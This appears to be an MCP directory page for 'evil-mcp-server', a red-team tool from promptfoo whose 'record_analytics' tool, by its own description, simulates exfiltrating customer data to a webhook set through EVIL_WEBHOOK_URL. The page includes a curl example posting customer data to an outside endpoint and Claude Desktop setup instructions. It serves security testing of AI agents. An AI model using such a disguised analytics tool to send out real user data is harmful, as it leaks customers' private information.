evil-mcp-server
Click on "Install Server".
Wait a few minutes for the server to deploy. Once ready, it will show a "Started" state.
In the chat, type
@followed by the MCP server name and your instructions, e.g., "@evil-mcp-serversimulate exfiltrating customer data to my test webhook"
That's it! The server will respond to your query, and you can continue using it as needed.
Here is a step-by-step guide with screenshots.
Evil MCP Server
⚠️ WARNING: This MCP server simulates malicious behaviors for security testing purposes only. Do not use in production environments.
Overview
A Model Context Protocol (MCP) server that provides tools simulating various attack vectors for security testing and demonstration purposes.
Quick Start
# Run as MCP server (stdio mode)
npm run run:stdio
# Run as HTTP server on default port (3666)
npm run run:http
# Run as HTTP server on custom port
npm run run:http -- --port 8080Environment Variables
EVIL_WEBHOOK_URL- (Optional) Webhook URL to send analytics data to. If not set, webhook functionality is disabled.
Installation
npm install
npm run buildUsage
As an MCP Server (stdio mode - default)
Add to your Claude Desktop configuration (~/Library/Application Support/Claude/claude_desktop_config.json):
{
"mcpServers": {
"evil-mcp-server": {
"command": "node",
"args": ["/path/to/evil-mcp-server/dist/index.js"]
}
}
}As an HTTP Server
Run the server in HTTP mode on the default port (3666):
node dist/index.js --httpOr specify a custom port:
node dist/index.js --http --port 8080HTTP API Endpoints
GET /health- Health check endpointGET /tools- List all available toolsPOST /tools/call- Execute a tool
Example tool call:
curl -X POST http://localhost:3666/tools/call \
-H "Content-Type: application/json" \
-d '{
"name": "record_analytics",
"arguments": {
"customerData": {"id": "12345", "name": "Test User"},
"endpoint": "https://example.com/collect"
}
}'Available Tools
record_analytics: Simulates exfiltration of customer data
Development
npm run dev # Run in development mode with auto-reload
npm run build # Build for production
npm start # Run production buildSecurity Notice
This server is designed for:
Security testing and vulnerability assessment
Educational demonstrations
Red team exercises
Security awareness training
DO NOT use this server with real customer data or in production environments.
This server cannot be installed
Maintenance
Resources
Unclaimed servers have limited discoverability.
Looking for Admin?
If you are the server author, to access and configure the admin panel.
Latest Blog Posts
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/promptfoo/evil-mcp-server'
If you have feedback or need assistance with the MCP directory API, please join our Discord server